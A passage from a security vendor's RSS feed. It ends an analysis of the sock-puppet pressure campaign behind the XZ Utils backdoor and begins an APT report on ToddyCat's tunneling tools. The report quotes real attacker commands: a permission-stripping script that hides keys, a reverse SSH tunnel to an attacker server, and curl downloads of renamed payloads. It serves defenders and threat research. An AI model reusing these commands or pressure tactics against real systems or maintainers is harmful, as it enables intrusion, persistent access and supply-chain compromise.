  977. <p>If we take the first interaction on the xz-devel mailing list as the start of the campaign, Jia Tan sent a <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00512.html" target="_blank" rel="noopener">superficial code patch</a> on September 29, 2021. This timestamp is eight months after the GitHub account creation date. This initial contribution is harmless, but establishes this identity within the open-source project.</p>
  978. <p>A year later, Jigar Kumar pressured Lasse Collin to hand over access to Jia Tan over the spring and summer of 2022 in six chiding comments over two different threads.</p>
  979. <table width="100%">
  980. <tbody>
  981. <tr>
  982. <td width="40%">Wed, 27 Apr 2022 11:42:57 -0700</td>
  983. <td width="60%"><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00555.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  984. </tr>
  985. <tr>
  986. <td colspan="2">Your efforts are good but based on the slow release schedule it will unfortunatly be years until the community actually gets this quality of life feature.</td>
  987. </tr>
  988. <tr>
  989. <td>Thu, 28 Apr 2022 10:10:48 -0700</td>
  990. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00557.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  991. </tr>
  992. <tr>
  993. <td colspan="2">Patches spend years on this mailing list. 5.2.0 release was 7 years ago. There<br />
  994. is no reason to think anything is coming soon.</td>
  995. </tr>
  996. <tr>
  997. <td>Fri, 27 May 2022 10:49:47 -0700</td>
  998. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00565.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  999. </tr>
  1000. <tr>
  1001. <td colspan="2">Over 1 month and no closer to being merged. Not a suprise.</td>
  1002. </tr>
  1003. <tr>
  1004. <td>Tue, 07 Jun 2022 09:00:18 -0700</td>
  1005. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00566.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
  1006. </tr>
  1007. <tr>
  1008. <td colspan="2">Progress will not happen until there is new maintainer. XZ for C has sparse<br />
  1009. commit log too. Dennis you are better off waiting until new maintainer happens<br />
  1010. or fork yourself. Submitting patches here has no purpose these days. The<br />
  1011. current maintainer lost interest or doesn&#8217;t care to maintain anymore. It is sad<br />
  1012. to see for a repo like this.</td>
  1013. </tr>
  1014. <tr>
  1015. <td>Tue, 14 Jun 2022 11:16:07 -0700</td>
  1016. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00568.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
  1017. </tr>
  1018. <tr>
  1019. <td colspan="2">With your current rate, I very doubt to see 5.4.0 release this year. The only<br />
  1020. progress since april has been small changes to test code. You ignore the many<br />
  1021. patches bit rotting away on this mailing list. Right now you choke your repo.<br />
  1022. Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?</td>
  1023. </tr>
  1024. <tr>
  1025. <td>Wed, 22 Jun 2022 10:05:06 -0700</td>
  1026. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00570.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
  1027. </tr>
  1028. <tr>
  1029. <td colspan="2">&#8220;Is there any progress on this? Jia I see you have recent commits. Why can&#8217;t you<br />
  1030. commit this yourself?&#8221;</td>
  1031. </tr>
  1032. </tbody>
  1033. </table>
  1034. <p>The Dennis Ens identity sets up a thread of their own, and follows up by pressuring maintainer Collin in one particularly forceful and obnoxious message to the list. The identity leverages a personal vulnerability that Collin shared on this thread. The Jigar Kumar identity responds twice to this thread, bitterly complaining about the maintainer: &#8220;Dennis you are better off waiting until new maintainer happens or fork yourself.&#8221;</p>
  1035. <table width="100%">
  1036. <tbody>
  1037. <tr>
  1038. <td width="40%">Thu, 19 May 2022 12:26:03 -0700</td>
  1039. <td width="60%"><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00562.html" target="_blank" rel="noopener">XZ for Java</a></td>
  1040. </tr>
  1041. <tr>
  1042. <td colspan="2">Is XZ for Java still maintained? I asked a question here a week ago<br />
  1043. and have not heard back. When I view the git log I can see it has not<br />
  1044. updated in over a year. I am looking for things like multithreaded<br />
  1045. encoding / decoding and a few updates that Brett Okken had submitted<br />
  1046. (but are still waiting for merge). Should I add these things to only<br />
  1047. my local version, or is there a plan for these things in the future?</td>
  1048. </tr>
  1049. <tr>
  1050. <td>Tue, 21 Jun 2022 13:24:47 -0700</td>
  1051. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00569.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
  1052. </tr>
  1053. <tr>
  1054. <td colspan="2">I am sorry about your mental health issues, but its important to be<br />
  1055. aware of your own limits. I get that this is a hobby project for all<br />
  1056. contributors, but the community desires more. Why not pass on<br />
  1057. maintainership for XZ for C so you can give XZ for Java more<br />
  1058. attention? Or pass on XZ for Java to someone else to focus on XZ for<br />
  1059. C? Trying to maintain both means that neither are maintained well.</td>
  1060. </tr>
  1061. </tbody>
  1062. </table>
  1063. <p>Reflecting on these data points still leads us to shaky ground. Until more details are publicized, we are left with speculation:</p>
  1064. <ul>
  1065. <li>In a three-year project, a small team successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. They manipulated the introduction of a malicious actor into the trusted position of code co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions.</li>
  1066. <li>In a three-year project, an individual successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. The one individual managed several identities to manipulate their own introduction into the trusted position of open source co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions.</li>
  1067. <li>In an extremely short timeframe in early 2024, a small team successfully manipulated an individual (Jia Tan) who legitimately earned access to an interesting open-source project as code maintainer. Two other individuals (Jigar Kumar, Dennis Ens) may have coincidentally complained and pressured Collin to hand over the maintainer role. That leveraged individual began inserting malicious code into the project over the course of a couple of weeks.</li>
  1068. </ul>
  1069. <h2 id="spring-2024-pressure-to-import-backdoored-code-to-debian">Spring 2024 Pressure to Import Backdoored Code to Debian</h2>
  1070. <p>Several identities attempted to pressure Debian maintainers to import the backdoored upstream XZ Utils code to their distribution in March 2024. The Hans Jansen identity created a <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708" target="_blank" rel="noopener">Debian report log</a> on March 25, 2024 to raise urgency to include the backdoored code: &#8220;Dear mentors, I am looking for a sponsor for my package &#8220;xz-utils&#8221;.&#8221;</p>
  1071. <table width="100%">
  1072. <tbody>
  1073. <tr>
  1074. <td width="50%"><strong>Name</strong></td>
  1075. <td width="50%"><strong>Email address</strong></td>
  1076. </tr>
  1077. <tr>
  1078. <td>Hans Jansen</td>
  1079. <td>hansjansen162@outlook.com</td>
  1080. </tr>
  1081. <tr>
  1082. <td>krygorin4545</td>
  1083. <td>krygorin4545@proton.me</td>
  1084. </tr>
  1085. <tr>
  1086. <td>misoeater91@tutamail.com</td>
  1087. <td>misoeater91@tutamail.com</td>
  1088. </tr>
  1089. </tbody>
  1090. </table>
  1091. <p>The thread was responded to within a day by additional identities using the email address scheme name-number@freeservice[.]com:</p>
  1092. <table>
  1093. <tbody>
  1094. <tr>
  1095. <td>Date: Tue, 26 Mar 2024 19:27:47 +0000</td>
  1096. <td>From: krygorin4545 &lt;krygorin4545@proton.me&gt;</td>
  1097. </tr>
  1098. <tr>
  1099. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=17">Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] &#8212; XZ-format compression utilities</a></td>
  1100. </tr>
  1101. <tr>
  1102. <td colspan="2">Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work</td>
  1103. </tr>
  1104. <tr>
  1105. <td>Date: Tue, 26 Mar 2024 22:50:54 +0100 (CET)</td>
  1106. <td>From: misoeater91@tutamail.com</td>
  1107. </tr>
  1108. <tr>
  1109. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=22">Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] &#8212; XZ-format compression</a></td>
  1110. </tr>
  1111. <tr>
  1112. <td colspan="2">I noticed this last week and almost made a valgrind bug. Glad to see it being fixed. Thanks Hans!</td>
  1113. </tr>
  1114. </tbody>
  1115. </table>
  1116. <p>The code changes received pushback from Debian contributors:</p>
  1117. <table>
  1118. <tbody>
  1119. <tr>
  1120. <td>Date: Tue, 26 Mar 2024 22:11:19 +0000 (UTC)</td>
  1121. <td>From: Thorsten Glaser &lt;tg@debian.org&gt;</td>
  1122. </tr>
  1123. <tr>
  1124. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=27">Subject: new upstream versions as NMU vs. xz maintenance</a></td>
  1125. </tr>
  1126. <tr>
  1127. <td colspan="2">Very much *not* a fan of NMUs doing large changes such as<br />
  1128. new upstream versions. But this does give us the question, what&#8217;s up with the<br />
  1129. maintenance of xz-utils? Same as with the lack of security<br />
  1130. uploads of git, which you also maintain, are you active?</td>
  1131. </tr>
  1132. <tr>
  1133. <td colspan="2">Are you well?</td>
  1134. </tr>
  1135. </tbody>
  1136. </table>
  1137. <p>To which one of these likely sock puppet accounts almost immediately responded, in order to counteract any distraction from pushing the changes:</p>
  1138. <table>
  1139. <tbody>
  1140. <tr>
  1141. <td>Date: Wed, 27 Mar 2024 12:46:32 +0000</td>
  1142. <td>From: krygorin4545 &lt;krygorin4545@proton.me&gt;</td>
  1143. </tr>
  1144. <tr>
  1145. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708#37">Subject: Re: Bug#1067708: new upstream versions as NMU vs. xz maintenance</a></td>
  1146. </tr>
  1147. <tr>
  1148. <td colspan="2">Instead of having a policy debate over who is proper to do this upload, can this just be fixed? The named maintainer hasn&#8217;t done an upload in 5 years. Fedora considered this a serious bug and fixed it weeks ago (&lt;https://bugzilla.redhat.com/show_bug.cgi?id=2267598&gt;). Fixing a valgrind break across many apps throughout Debian is the priority here.</td>
  1149. </tr>
  1150. </tbody>
  1151. </table>
  1152. <h2 id="what-nexzt">What NeXZt?</h2>
  1153. <p>Clearly social engineering techniques have much lower technical requirements to gain full access to development environments than what we saw with prior supply chain attacks like the Solarwinds, M.E.Doc ExPetya, and ASUS ShadowHammer incidents. We have presented and compared these particular supply chain attacks, their techniques, and their complexities, at <a href="https://securelist.com/webinars/sas-2021-time-to-make-the-donuts/" target="_blank" rel="noopener"> prior SAS events [registration required]</a>, distilling an assessment into a manageable table.</p>
  1154. <p>Unfortunately, we expect more open-source project incidents like the XZ Utils compromise to be exposed in the months to come. As a matter of fact, at the time of this writing, the Open Source Security Foundation (OSSF) has identified <a href="https://openssf.org/blog/2024/04/15/open-source-security-openssf-and-openjs-foundations-issue-alert-for-social-engineering-takeovers-of-open-source-projects/" target="_blank" rel="noopener">similar social engineering-driven incidents</a> in other open-source projects, and claims that the XZ Utils social engineering effort is highly likely not an isolated incident.</p>
  1155. ]]></content:encoded>
  1156. <wfw:commentRss>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/feed/</wfw:commentRss>
  1157. <slash:comments>2</slash:comments>
  1158. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-scaled.jpg" width="2668" height="1499"><media:keywords>full</media:keywords></media:content>
  1159. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-1024x575.jpg" width="1024" height="575"><media:keywords>large</media:keywords></media:content>
  1160. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  1161. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1162. </item>
  1163. <item>
  1164. <title>ToddyCat is making holes in your infrastructure</title>
  1165. <link>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/</link>
  1166. <comments>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/#comments</comments>
  1167. <dc:creator><![CDATA[Andrey Gunkin, Alexander Fedotov, Natalya Shornikova]]></dc:creator>
  1168. <pubDate>Mon, 22 Apr 2024 10:00:00 +0000</pubDate>
  1169. <category><![CDATA[APT reports]]></category>
  1170. <category><![CDATA[APT]]></category>
  1171. <category><![CDATA[Cyber espionage]]></category>
  1172. <category><![CDATA[Data theft]]></category>
  1173. <category><![CDATA[SSH]]></category>
  1174. <category><![CDATA[Targeted attacks]]></category>
  1175. <category><![CDATA[ToddyCat]]></category>
  1176. <category><![CDATA[VPN]]></category>
  1177. <category><![CDATA[WhatsApp]]></category>
  1178. <category><![CDATA[APT (Targeted attacks)]]></category>
  1179. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112443</guid>
  1180.  
  1181. <description><![CDATA[We continue to report on the APT group ToddyCat. This time, we’ll talk about traffic tunneling, constant access to a target infrastructure and data extraction from hosts.]]></description>
  1182. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>We continue covering the activities of the APT group <a href="https://securelist.com/tag/toddycat/" target="_blank" rel="noopener"><strong>ToddyCat</strong></a>. In our <a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" target="_blank" rel="noopener">previous article</a>, we described tools for collecting and exfiltrating files (<strong>LoFiSe</strong> and <strong>PcExter</strong>). This time, we have investigated how attackers obtain constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they use to extract it.</p>
  1183. <p><strong>ToddyCat </strong>is an <a href="https://encyclopedia.kaspersky.ru/glossary/apt-advanced-persistent-threats/" target="_blank" rel="noopener">APT</a> group that predominantly targets governmental organizations, some of them defense related, located in the Asia-Pacific region. One of the group&#8217;s main goals is to steal sensitive information from hosts.</p>
  1184. <p>During the observation period, we noted that this group stole data on an industrial scale. To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack. We decided to investigate how this was implemented by ToddyCat. Note that all tools described in this article are applied at the stage where the attackers have compromised high-privileged user credentials allowing them to connect to remote hosts. In most cases, the adversary connected, transferred and run all required tools with the help of <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/psexec" target="_blank" rel="noopener">PsExec</a> or <a href="https://github.com/fortra/impacket" target="_blank" rel="noopener">Impacket</a>.</p>
  1185. <h2 id="tools-for-traffic-tunneling">Tools for traffic tunneling</h2>
  1186. <p>Having several tunnels to the infected infrastructure implemented with different tools allows attackers to maintain access to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.</p>
  1187. <h3 id="reverse-ssh-tunnel">Reverse SSH Tunnel</h3>
  1188. <p>One way to gain access to remote network services is to create a reverse SSH tunnel.</p>
  1189. <p>Attackers use several files to launch a reverse SSH tunnel:</p>
  1190. <ol>
  1191. <li>The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it</li>
  1192. <li>An OpenSSH private key file</li>
  1193. <li>The &#8220;<strong>a.bat</strong>&#8221; script to hide the private key file</li>
  1194. </ol>
  1195. <p>The attackers transferred all files to the target host via <strong>SMB </strong>with the help of shared folders <strong>(<a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002: </a><a href="https://attack.mitre.org/techniques/T1021/002/" target="_blank" rel="noopener">Remote Services: SMB/Windows Admin Shares</a>)</strong>.</p>
  1196. <p>The attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original name and was placed inside folders whose names indicated the presence of an SSH client in the system.</p><pre class="crayon-plain-tag">C:\program files\OpenSSH\ssh.exe
  1197. C:\programdata\sshd\ssh.exe
  1198. C:\programdata\ssh\ssh.exe</pre><p>
  1199. The private key files required for establishing a connection to the remote server were copied to the following paths.</p><pre class="crayon-plain-tag">C:\Windows\AppReadiness\read.ini
  1200. C:\Windows\AppReadiness\data.dat
  1201. C:\Windows\AppReadiness\log.dat
  1202. C:\Windows\AppReadiness\value.dat</pre><p>
  1203. <strong>OpenSSH </strong>private key files are normally created without extensions, but they can be given the extension .key or similar. In the example, the attackers used .ini and .dat extensions for private key files, obviously to hide their true purpose. Files like that look less suspicious in the command-line interface than .key files or files without an extension.</p>
  1204. <p>After the private key files have been copied to the <strong>AppReadiness </strong>folder, the adversary copies and runs an <strong>a.bat</strong> script. In the attacked systems, it was found mostly in temporary directories or in users&#8217; shared folders.</p><pre class="crayon-plain-tag">c:\users\public\a.bat</pre><p>
  1205. This file contains the following commands.</p><pre class="crayon-plain-tag">@echo off
  1206. ::# Set Key File Variable:
  1207.  
  1208. Set Key="C:\Windows\AppReadiness"
  1209.  
  1210. takeown /f "%Key%"
  1211. icacls "%Key%" /remove "BUILTIN\Administrators" &gt; "%temp%\a.txt"
  1212. icacls "%Key%" /remove "Administrators" &gt;&gt; "%temp%\a.txt"
  1213. icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" &gt;&gt; "%temp%\a.txt"
  1214. icacls "%Key%" /remove "CREATOR OWNER" &gt;&gt; "%temp%\a.txt"
  1215. icacls "%Key%" /remove "BUILTIN\Users" &gt;&gt; "%temp%\a.txt"
  1216. icacls "%Key%" /remove "Users" &gt;&gt; "%temp%\a.txt"
  1217. icacls "%Key%" &gt;&gt; "%temp%\a.txt"
  1218.  
  1219. ::# Remove Variable:
  1220. set "Key="</pre><p>
  1221. In Windows,<strong> C:\Windows\AppReadiness</strong> is part of the AppReadiness service and stores application files for initial configuration when applications are first launched or when a user logs on for the first time.</p>
  1222. <div id="attachment_112447" style="width: 813px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112447" class="size-full wp-image-112447" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png" alt="The icacls command output for the AppReadiness folder with default values" width="803" height="167" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png 803w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-300x62.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-768x160.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-800x166.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-740x154.png 740w" sizes="(max-width: 803px) 100vw, 803px" /></a><p id="caption-attachment-112447" class="wp-caption-text">The icacls command output for the AppReadiness folder with default values</p></div>
  1223. <p>The image above shows the default permissions for this folder:</p>
  1224. <ul>
  1225. <li>Administrators and system: full permissions</li>
  1226. <li>Authorized users: read-only permissions</li>
  1227. </ul>
  1228. <p>This means that regular users can view the contents of the folder.</p>
  1229. <p>The <strong>a.bat</strong> script sets the system as the owner of the folder and removes all other users from its discretionary access control list (DACL). The image below shows the DACL for <strong>C:\Windows\AppReadiness</strong> after the script has run:</p>
  1230. <div id="attachment_112448" style="width: 803px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112448" class="size-full wp-image-112448" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png" alt="The icacls command output for the AppReadiness folder after a.bat script has executed" width="793" height="101" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png 793w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-300x38.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-768x98.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-740x94.png 740w" sizes="(max-width: 793px) 100vw, 793px" /></a><p id="caption-attachment-112448" class="wp-caption-text">The icacls command output for the AppReadiness folder after a.bat script has executed</p></div>
  1231. <p>Once the permissions have been changed, neither normal users nor administrators will be able to access this folder. Attempting to open it will cause a &#8220;no permission&#8221; error.</p>
  1232. <div id="attachment_112449" style="width: 746px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112449" class="size-full wp-image-112449" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png" alt="Access denied error and Security tab for the AppReadiness folder" width="736" height="496" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png 736w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-300x202.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-519x350.png 519w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-415x280.png 415w" sizes="(max-width: 736px) 100vw, 736px" /></a><p id="caption-attachment-112449" class="wp-caption-text">Access denied error and Security tab for the AppReadiness folder</p></div>
  1233. <p>To start the tunnel, attackers create a scheduled task that runs the following command.</p><pre class="crayon-plain-tag">C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o
  1234. StrictHostKeyChecking=accept-new -R 31481:localhost:53
  1235. systemtest01@103[.]27.202.85 -p 22222 -fN</pre><p>
  1236. This command creates an SSH connection to a remote server with the IP address <strong>103[.]27.202.85</strong> on port <strong>22222 </strong>as the user named <strong>systemtestXX</strong>, where <strong>XX</strong> is a number. This connection will redirect network traffic from a certain port on the server to a certain port on the infected host. This is needed to provide the malicious server with constant access to the services running on the target host and listening on the specified port.</p>
  1237. <p>In the example above, the user <strong>systemtest01</strong> establishes a connection that redirects traffic from port <strong>31481 </strong>on the server to port <strong>53</strong> on the target host. A connection like this created on domain controllers allows attackers to obtain the IP addresses of hosts on the internal network through DNS queries.</p>
  1238. <p>Each user is assigned to a different port on the infected host. For example, the user <strong>systemtest05 </strong>redirects traffic from the malicious server to port <strong>445</strong>, normally used by SMB services.</p>
  1239. <p>The remote server IP information is shown in the table below.</p>
  1240. <table width="100%">
  1241. <tbody>
  1242. <tr>
  1243. <td width="17%"><strong>IP</strong></td>
  1244. <td width="16%"><strong>Country + ASN</strong></td>
  1245. <td width="16%"><strong>Net name</strong></td>
  1246. <td width="17%"><strong>Net Description</strong></td>
  1247. <td width="17%"><strong>Address </strong></td>
  1248. <td width="17%"><strong>Email </strong></td>
  1249. </tr>
  1250. <tr>
  1251. <td>103.27.202[.]85</td>
  1252. <td>Thailand, AS58955</td>
  1253. <td>BANGMOD-VPS-NETWORK</td>
  1254. <td>Bangmod VPS Network</td>
  1255. <td>Bangmod-IDC Supermicro Thailand Powered by CSloxinfo</td>
  1256. <td>support@bangmod.co.th</td>
  1257. </tr>
  1258. </tbody>
  1259. </table>
  1260. <p>The whole process of creating an SSH tunnel can be described with the diagram given below.</p>
  1261. <div id="attachment_112450" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22103620/ToddyCat_data_clollection_and_tunneling_042.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112450" class="size-large wp-image-112450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22103620/ToddyCat_data_clollection_and_tunneling_042.png" alt="Diagram of SSH tunnel creation" width="1024" height="459" /></a><p id="caption-attachment-112450" class="wp-caption-text">Diagram of SSH tunnel creation</p></div>
  1262. <h3 id="softether-vpn">SoftEther VPN</h3>
  1263. <p>The next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN package.</p>
  1264. <p><a href="https://www.softether.org" target="_blank" rel="noopener">SoftEther VPN</a> is an open-source solution developed as part of academic research at the University of Tsukuba that allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.</p>
  1265. <p>To launch the VPN server, the attackers used the following files:</p>
  1266. <ul>
  1267. <li><strong>vpnserver_x64.exe</strong>: a digitally signed VPN server executable</li>
  1268. <li><strong>hamcore.se2</strong>: a container file that includes components required to run vpnserver_x64.exe</li>
  1269. <li><strong>vpn_server.config</strong>: server configuration</li>
  1270. </ul>
  1271. <p>In the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a command-line parameter.</p>
  1272. <p>In virtually every case we observed, the attackers renamed <strong>vpnserver_x64.exe</strong> to hide its purpose in the infected system. The following names of, and paths to, this file are known:</p><pre class="crayon-plain-tag">c:\programdata\ssh\vmtools.exe
  1273. c:\programdata\lenovo\lenovo\kln.exe
  1274. c:\programdata\iobit\iobitrtt\tmp\mstime.exe
  1275. c:\perflogs\ecache\boot.exe
  1276. C:\users\public\music\wia.exe
  1277. c:\windows\debug\wia\wia.exe
  1278. c:\users\public\music\taskllst.exe
  1279. c:\programdata\lenovo\lenovo\main.exe
  1280. c:\programdata\intel\gcc\gcc\boot.exe
  1281. c:\programdata\lenovo\lenovodisplaycontrolcenterservice\netscan.exe
  1282. c:\programdata\kasperskylab\kaspersky.exe</pre><p>
  1283. You may notice that in some cases, the attackers used the names of security products to conceal the purpose of the file.</p>
  1284. <p>The file <strong>hamcore.se2</strong> was not renamed in the attacked systems, as it was loaded by the VPN server by name from the same folder where the VPN server executable was located.</p>
  1285. <p>To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources (<strong><a href="https://attack.mitre.org/techniques/T1021/002/" target="_blank" rel="noopener">T1021.002 Remote Services: SMB/Windows Admin Shares</a></strong>), and downloaded files from remote resources using the <strong>curl </strong>utility (see below).</p><pre class="crayon-plain-tag">"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o
  1286. c:\windows\debug\wia\wia.exe &gt; C:\WINDOWS\Temp\vwqkspeq.tmp 2&gt;&amp;1
  1287. "cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o
  1288. c:\windows\debug\wia\hamcore.se2 &gt; C:\WINDOWS\Temp\nohEicOE.tmp 2&gt;&amp;1</pre><p>
  1289. We observed the following remote resources being used as download sources.</p>
  1290. <table width="100%">
  1291. <tbody>
  1292. <tr>
  1293. <td width="65%"><strong>URL</strong></td>
  1294. <td width="35%"><strong>Original file name</strong></td>
  1295. </tr>
  1296. <tr>
  1297. <td>hxxp://www.netportal.or[.]kr/common/css/main.js</td>
  1298. <td>vpnserver_x64.exe</td>
  1299. </tr>
  1300. <tr>
  1301. <td>hxxp://www.netportal.or[.]kr/common/css/ham.js</td>
  1302. <td>Hamcore.se2</td>
  1303. </tr>
  1304. <tr>
  1305. <td>hxxp://23.106.122[.]5/hamcore.se2</td>
  1306. <td>Hamcore.se2</td>
  1307. </tr>
  1308. <tr>
  1309. <td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</td>
  1310. <td>vpnserver_x64.exe</td>
  1311. </tr>
  1312. <tr>
  1313. <td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</td>
  1314. <td>Hamcore.se2</td>
  1315. </tr>
  1316. </tbody>
  1317. </table>
  1318. <p>In most cases, the configuration file was copied along with the server executable. However, in some cases, it was not copied but created by executing vpnserver_x64.exe with the options <strong>/install</strong> or <strong>/usermode_hidetray</strong>, and then edited.</p><pre class="crayon-plain-tag">"cmd.exe" /C c:\users\public\music\taskllst.exe /install &gt; C:\Windows\Temp\fnOcaiqm.tmp 2&gt;&amp;1
  1319. "cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray &gt; C:\Windows\Temp\TSwkLRsR.tmp</pre><p>
  1320. In this case, after installing the server in the system, the attackers changed the server settings in <strong>vpn_server.config</strong>.</p>
  1321. <p>Data for connecting the remote client to the server and its authentication details are added to the configuration file:</p>
  1322. <table width="100%">
  1323. <tbody>
  1324. <tr>
  1325. <td width="60%"><strong>AccountName</strong></td>
  1326. <td width="40%"><strong>Hostname</strong></td>
  1327. </tr>
  1328. <tr>
  1329. <td>ha.bbmouseme[.]com</td>
  1330. <td>118[.]193.40.42</td>
  1331. </tr>
  1332. </tbody>
  1333. </table>
